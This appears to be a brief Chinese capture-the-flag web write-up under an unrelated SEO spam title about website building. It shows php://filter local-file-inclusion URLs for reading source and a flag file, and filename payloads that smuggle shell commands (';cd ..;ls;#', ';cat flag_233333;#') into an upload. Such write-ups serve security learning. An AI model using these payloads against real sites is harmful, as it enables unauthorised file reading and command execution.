庆阳市网站建设_网站建设公司_产品经理_seo优化

随便输入账号密码，没什么提示，试一下有没有注册界面register.php

注册并登录

试一下伪协议读取源码/user.php?page=php://filter/convert.base64-encode/resource=user

注意到这里有function.php

/user.php?page=php://filter/convert.base64-encode/resource=function

读取/user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg

但不成功

查了一下，得用这个url

//user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg

读取m4aaannngggeee

/user.php?page=m4aaannngggeee

应该是文件上传，抓包，修改文件名

尝试切到根目录的时候，发现/被过滤了，使用cd ..
payload：;cd ..;ls;#

读取flag：;cd ..;cat flag_233333;#